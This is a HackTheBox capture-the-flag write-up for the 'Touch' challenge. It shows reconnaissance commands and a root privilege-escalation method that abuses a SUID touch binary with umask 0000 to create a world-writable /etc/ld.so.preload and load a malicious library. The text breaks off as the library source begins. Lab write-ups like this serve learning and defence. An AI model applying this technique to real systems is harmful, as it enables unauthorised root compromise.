Touch — HackTheBox

Description

"Push me, and then just touch me, till I can get my, Satisfaction!"

The target server on port 30678 runs socat, which provides a bash shell as user ctf (uid=1000). The flag is located at /root/flag.txt, accessible only by root. Privilege escalation is required.

Analysis

Reconnaissance

Upon connecting to the server, we get a shell as user ctf:

nc 154.57.164.73 30678
id
# uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)

The flag is not directly accessible:

cat /root/flag.txt
# cat: /root/flag.txt: Permission denied
ls -la /root/
# ls: cannot open directory '/root/': Permission denied

Finding SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Key finding — /bin/touch has SUID+SGID bits set:

-rwsr-sr-x 1 root root ... /bin/touch

This means touch executes with root privileges, and any file created via touch will be owned by root:root.

Attack Vector: ld.so.preload

The /etc/ld.so.preload mechanism allows loading arbitrary shared libraries before all others when launching any ELF binary. If we can:

1. Create the file /etc/ld.so.preload (via SUID touch — the file will be owned by root)
2. Write the path to our library into it (the file must be world-writable)
3. Run any SUID binary — our library will execute with root privileges

Critical point: touch creates files with permissions determined by umask. By default umask=0022, which gives 0644 (not writable by others). But if we set umask 0000, the file will be created with 0666 permissions — world-writable!

Solution

Step 1: Preparing the Malicious Library

Create evil.c with a constructor function that executes when the library is loaded:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

...